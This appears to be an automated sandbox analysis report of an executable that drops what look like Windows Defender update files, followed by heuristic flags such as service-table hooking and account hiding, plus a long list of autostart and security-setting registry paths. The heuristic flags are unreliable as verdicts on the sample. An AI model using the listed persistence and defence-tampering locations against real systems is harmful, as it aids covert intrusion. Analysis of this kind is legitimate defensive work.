Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpDetours.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\mpasbase.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\nl-NL\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ug-CN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\hu-HU\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\pa-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\de-DE\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\sv-SE\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\uk-UA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpClient.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ml-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\Drivers\WdNisDrv.sys Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\de-DE\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\cs-CZ\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\eu-ES\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpRtp.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\tr-TR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\x86\MpCmdRun.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\pt-BR\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\id-ID\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ru-RU\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\he-IL\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\zh-CN\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\x86\MsMpLics.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\nb-NO\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\el-GR\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\fi-FI\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\sl-SI\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\mt-MT\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpAzSubmit.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\th-TH\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ko-KR\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\kok-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\lo-LA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\zh-TW\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\endpointdlp.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\DefenderCSP.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\mpavdlta.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\fr-FR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\pt-BR\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ta-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\uk-UA\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\kk-KZ\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\pl-PL\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\en-US\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\pt-BR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MsMpLics.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\en-GB\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\id-ID\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ar-SA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ko-KR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\mi-NZ\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\mpavbase.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\Drivers\WdBoot.sys Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\gd-GB\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\lv-LV\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\sl-SI\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\nl-NL\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\en-US\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\es-ES\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\gu-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\nn-NO\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ca-ES\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\fr-FR\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\pl-PL\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ru-RU\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\tt-RU\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpCommu.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ko-KR\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\hr-HR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\hi-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\is-IS\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\cy-GB\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\fi-FI\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\sk-SK\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\nb-NO\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\quz-PE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ro-RO\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpDetoursCopyAccelerator.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\af-ZA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\lv-LV\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\sr-Latn-RS\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\sv-SE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\kn-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\da-DK\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E304B0C8 OpenSCManagerW,OpenServiceW,CloseServiceHandle,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle, 18_2_00007FF7E304B0C8

Hooking and other Techniques for Hiding and Protection:

barindex
May modify the system service descriptor table (often done to hook functions)
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp Binary or memory string: KeServiceDescriptorTable
Contains functionality to hide user accounts
Source: MpSigStub.exe, 0000000B.00000003.18288932805.0000021B5ED46000.00000004.00000001.sdmp String found in binary or memory: DOWS\CURRENTVERSION\INTERNET SETTINGS\\CertificateRevocationXHKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\\CertificateRevocationSHKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\USER AGENT\\*SHKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\USER AGENT\\*DHKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\PREAPPROVED\*\\*DHKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\PREAPPROVED\*\\*LHKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\WindowsUpdate\Auto Update\\*>HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\\*WHKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\SpecialAccounts\UserList\\*>HKCU\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\\*JHKLM\SOFTWARE\Wow6432Node\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\\*JHKCU\SOFTWARE\Wow6432Node\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\\*@HKCU\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\\LOADLHKCU\SOFTWARE\Wow6432Node\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\\LOAD?HKCU\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\\RUNKHKCU\SOFTWARE\Wow6432Node\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\\RUN^HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\*(1)\\DEBUGGERIHKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\PACKAGEDAPPXDEBUG\*(1)\\*IHKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\PACKAGEDAPPXDEBUG\*(1)\\*WHKCU\SOFTWARE\CLASSES\ACTIVATABLECLASSES\PACKAGE\*(1)\DEBUGINFORMATION\*(1)\\DEBUGPATHWHKLM\SOFTWARE\CLASSES\ACTIVATABLECLASSES\PACKAGE\*(1)\DEBUGINFORMATION\*(1)\\DEBUGPATHKHKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SYSTEMRESTORE\\DISABLESR+HKLM\SOFTWARE\MICROSOFT\SECURITY CENTER\\*/HKLM\SOFTWARE\MICROSOFT\SECURITY CENTER\SVC\\*>HKLM\Software\Microsoft\Windows Defender Security Center\*\\*-HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\\*-HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\\*2HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\EUPP\\*2HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\EUPP\\*6HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\EUPP\DSP\\*6HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\EUPP\DSP\\*GHKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\DOWNLOAD\\CHECKEXESIGNATURESEHKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\DESKTOP\GENERAL\\WALLPAPERDHKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\PHISHINGFILTER\\ENABLEDV8AHKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\APPROVED EXTENSIONS\\*AHKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\APPROVED EXTENSIONS\\*HHKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\\*HHKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\\*
Stores large binary data to the registry
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Key value created or modified: HKEY_USERSS-1-5-20\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363} DeviceTicket Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Jump to behavior
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
